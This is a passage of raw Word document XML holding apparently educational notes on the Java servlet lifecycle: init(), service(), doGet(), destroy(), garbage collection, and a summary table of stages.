    <w:p w14:paraId="2524E46F" w14:textId="77777777" w:rsidR="00E65118" w:rsidRPr="00CE4B95" w:rsidRDefault="00E651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598307"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135C32CB" w14:textId="77777777" w:rsidR="00E65118" w:rsidRPr="00CE4B95" w:rsidRDefault="00E651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598307"/>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ini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row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rvletExcepti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3155FA0" w14:textId="77777777" w:rsidR="00E65118" w:rsidRPr="00CE4B95" w:rsidRDefault="00E651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59830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nitialization code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535ECCEF" w14:textId="2E9A9014" w:rsidR="00E65118" w:rsidRPr="00CE4B95" w:rsidRDefault="00E651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598307"/>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32F08EEC" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00193873">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="57DEE85F">
          <v:rect id="_x0000_i1913" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A7BC0A" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3. Request Handling (service() method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE5B057" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1752"/>
        </w:num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 xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>each request</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, the container calls the service(ServletRequest req, ServletResponse res) method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AAB1E0" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1752"/>
        </w:num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It determines the request type (GET, POST, etc.) and calls the appropriate method like doGet() or doPost().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788B6CEF" w14:textId="77777777" w:rsidR="00E65118" w:rsidRPr="00CE4B95" w:rsidRDefault="00E651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1037959"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DF00BE" w14:textId="77777777" w:rsidR="00E65118" w:rsidRPr="00CE4B95" w:rsidRDefault="00E651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1037959"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>protecte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doGe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HttpServletRequest</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> req</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ttpServletResponse</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> res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row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rvletExcep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OExcepti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12C2C7F" w14:textId="77777777" w:rsidR="00E65118" w:rsidRPr="00CE4B95" w:rsidRDefault="00E651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10379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Handle GET request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DDFD5F" w14:textId="613EC277" w:rsidR="00E65118" w:rsidRPr="00CE4B95" w:rsidRDefault="00E651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1037959"/>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0D506E77" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00193873">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="1D8567B8">
          <v:rect id="_x0000_i1914" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AA818D" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4. Destruction (destroy() method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6538F282" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1753"/>
        </w:num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 xml:space="preserve">When the servlet is no longer needed (e.g., server shutdown or redeployment), the container calls the destroy() method </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>once</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BC61D5" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1753"/>
        </w:num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 xml:space="preserve">Used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>release resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> like closing DB connections, stopping threads, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6CE4B6" w14:textId="77777777" w:rsidR="00E65118" w:rsidRPr="00CE4B95" w:rsidRDefault="00E651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8921481"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8EF095" w14:textId="77777777" w:rsidR="00E65118" w:rsidRPr="00CE4B95" w:rsidRDefault="00E651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8921481"/>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destro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9B0757F" w14:textId="77777777" w:rsidR="00E65118" w:rsidRPr="00CE4B95" w:rsidRDefault="00E651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892148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leanup code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D144E44" w14:textId="6BEC4B8B" w:rsidR="00E65118" w:rsidRPr="00CE4B95" w:rsidRDefault="00E651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8921481"/>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75DA1854" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00193873">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="21E8C434">
          <v:rect id="_x0000_i1915" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE44893" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5. Garbage Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C10532" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1754"/>
        </w:num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 xml:space="preserve">After destroy() is called, the object is eligible for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>garbage collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F1282E" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00193873">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="79BBC7DE">
          <v:rect id="_x0000_i1916" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9F3E76" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lifecycl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5"/>
        <w:gridCol w:w="1024"/>
        <w:gridCol w:w="861"/>
        <w:gridCol w:w="1507"/>
      </w:tblGrid>
      <w:tr w:rsidR="00193873" w:rsidRPr="00CE4B95" w14:paraId="3B9AE168" w14:textId="77777777" w:rsidTr="00B94CCE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="772BEEDC" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00FA5823">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B775E63" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00FA5823">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D6CEE87" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00FA5823">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Called By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3707A6E8" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00FA5823">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Frequency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00193873" w:rsidRPr="00CE4B95" w14:paraId="3C21F215" w14:textId="77777777" w:rsidTr="00B94CCE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FC6256D" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">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Loading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F96ADDA" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">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Constructor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42984336" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">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Container</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66573F3D" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">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Once</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00193873" w:rsidRPr="00CE4B95" w14:paraId="414F4290" w14:textId="77777777" w:rsidTr="00B94CCE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D50F12F" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">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Initialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="254184F2" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">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init()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D960EE8" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">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Container</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60C6AFB3" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">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Once</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00193873" w:rsidRPr="00CE4B95" w14:paraId="7BE68628" w14:textId="77777777" w:rsidTr="00B94CCE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18B974AB" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">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Request Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DBD7C3F" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">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service()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0954323D" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">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Container</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E180E38" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">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For every request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00193873" w:rsidRPr="00CE4B95" w14:paraId="115ABA0E" w14:textId="77777777" w:rsidTr="00B94CCE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55B5AAA2" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">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Destruction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="355FFDAA" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">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destroy()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E93436A" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">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Container</w:t>
            </w:r>
          </w:p>
